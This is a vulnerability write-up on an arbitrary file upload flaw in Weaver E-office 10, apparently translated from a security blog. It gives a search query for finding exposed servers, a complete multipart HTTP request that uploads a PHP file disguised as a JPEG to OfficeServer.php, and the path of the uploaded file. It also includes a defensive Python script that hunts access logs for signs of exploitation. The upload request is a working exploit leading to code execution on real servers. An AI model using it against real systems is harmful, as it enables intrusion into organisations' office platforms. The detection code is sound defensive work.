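Weaver (泛微) E-office 10 OfficeServer Arbitrary File Upload Vulnerability

1. Vulnerability overview

Weaver e-office is a standardized collaborative OA (office automation) product. Weaver E-office 10 OfficeServer has an arbitrary file upload vulnerability: an attacker can upload arbitrary files, obtain a webshell, execute arbitrary commands on the server, read sensitive information, and so on.

2. Affected versions

  • Weaver OA E-office V10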

3. Asset mapping

  • hunter: web.body="eoffice10"&&web.body="eoffice_loading_tip"
  • Fingerprint (screenshot in the original)

4. Reproduction

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept-Encoding: gzip, deflate
Connection: close

------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg

<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"

{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

Uploaded file location:

/eoffice10/server/public/iWebOffice2015/Document/test12.php
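
An added log-hunting example (not part of the original write-up): it scans web access logs for POSTs to the upload endpoint and for script files requested from the Document/ directory shown above. The combined log format, the script-extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the request and the upload location shown above (lowercased).
UPLOAD_ENDPOINT = "/eoffice10/server/public/iweboffice2015/officeserver.php"
DOCUMENT_DIR = "/eoffice10/server/public/iweboffice2015/document/"
# Assumption: extensions the server would hand to the PHP interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Assumption: common/combined access log format.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def hunt(lines):
    """Flag script files requested from Document/ and tie them to uploaders."""
    uploaders = set()  # client IPs that POSTed to the upload endpoint
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        # Drop the query string, decode %xx, compare case-insensitively.
        path = unquote(target.split("?", 1)[0]).lower()
        if method == "POST" and path == UPLOAD_ENDPOINT:
            uploaders.add(ip)
        elif path.startswith(DOCUMENT_DIR) and SCRIPT_EXT.search(path):
            findings.append({
                "ip": ip, "time": when, "path": path, "status": int(status),
                "executed": status == "200",  # the script existed and ran
                "same_ip_uploaded": ip in uploaders,
            })
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
BASE = "/eoffice10/server/public/iWebOffice2015"
SAMPLE = [
    f'198.51.100.7 - - [12/Mar/2024:10:01:02 +0800] "POST {BASE}/OfficeServer.php HTTP/1.1" 200 12',
    f'198.51.100.7 - - [12/Mar/2024:10:01:05 +0800] "GET {BASE}/Document/test12.php HTTP/1.1" 200 85012',
    f'198.51.100.7 - - [12/Mar/2024:10:01:09 +0800] "GET {BASE}/Document/test12.php HTTP/1.1" 404 153',
    f'203.0.113.20 - - [12/Mar/2024:10:02:00 +0800] "GET {BASE}/Document/report.docx HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE):
        print(finding)
```

A 200 followed by a 404 for the same script path matches the sample above, whose uploaded file deletes itself after its first run, so the absence of the file on disk does not rule out a successful upload.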

Original: https://www.yuque.com/xiaokp7/ocvun2/hadg01niwv4pa405